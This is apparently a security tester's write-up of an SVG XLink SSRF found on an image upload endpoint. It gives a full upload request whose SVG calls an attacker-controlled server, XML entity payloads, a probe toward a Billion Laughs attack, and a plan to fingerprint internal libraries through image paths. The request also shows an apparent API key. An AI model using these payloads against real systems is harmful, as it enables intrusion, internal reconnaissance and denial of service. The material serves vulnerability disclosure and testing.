SVG XLink SSRF fingerprinting libraries version

• SSRF(Server-side-request-forgery) have been quite a popular attack surface for the uploading functionality where application fetches the assets from external resources in form of images,documents etc
• SVG is an XML based vector image used to display a variety of graphics on the Web and other environments, due it ’s XML structure it supports various XML features, one of the feature is XLink which is responsible for creating internal and external links within XML document.

During the testing process, I encountered with XLINK based SSRF to enumerate various internal libraries, installed tools, gnome version’s, much more etc,

POST /upload HTTP/1.1
Host: redacted.com
Connection: close
Content-Length: 1313
Accept: application/json, text/javascript, */*; q=0.01
Origin: https://redacted.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryINZ5MzqXAud4aYrN
Referer: https://redacted.com
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ceaa2f2d25275bb5879a726eb8c04aec7b3a64f7
------WebKitFormBoundaryINZ5MzqXAud4aYrN
Content-Disposition: form-data; name="timestamp"
1551244304
------WebKitFormBoundaryINZ5MzqXAud4aYrN
Content-Disposition: form-data; name="api_key"
413781391468673
------WebKitFormBoundaryINZ5MzqXAud4aYrN
Content-Disposition: form-data; name="file"; filename="test.jpg"
Content-Type: image/jpeg
<?xml version="1.0" encoding="UTF-8" standalone="no"?><svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="200" height="200"><image height="30" width="30" xlink:href="http://myserver:1337/" /></svg>

• Incoming Request at my server: Interestingly referer header shows the request has been generated from an internal network of the application which is hosting app over port 3000

• Since the application is accepting SVG based images, the second try would be to include the static entities to see if the parser is allowing custom entities.

<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE testingxxe [ <!ENTITY xml "POC for Static Entities Allowed">]>
<svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="200" height="200">
<text x="0" y="20" font-size="20">&xml;</text>
</svg>

• As parser is allowing static entities, Next step would be to include SYSTEM based entities along with DTD to fetch the malicious DTD which is more like XXE attack but parser was blocking system based entities in the backend, they had strong validation of the malicious malformed XML.

Since parser is blocking SYSTEM based entities our attack surface has been limited, Now it’s time to test Billion Laughs attack since application allowed static entities. Always note that: Before blinding fuzzing the various XML payloads, make sure to understand the parser logic, Before trying the billion laugh attack, I threw the server with simple callback entity function to see if the parser allows rendering of xml1 entity through callback of xml2 entity.

<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE testingxxe [ 
<!ENTITY xml1 "This is my first message">
<!ENTITY xml2 "&xml1";>
]>
<text x="0" y="20" font-size="20">&xml2;</text>
</svg>

• Unfortunately, the parser is blocking the callback entities as well. Now our attack surface is at ground level (Picture present fingerprint trick) by including the internal path along with picture present in system & we get interaction if that picture present internally on the system as described by @flyod at https://hackerone.com/reports/223203

• In order to enumerate all possible things, we need to build a wordlist for all possible local pictures present on the system.

• Now it’s time to make different port’s open or just with different paths& fuzz it along with all the internal picture path’s collected to fingerprint all possible libraries, script, tools installed along with versions.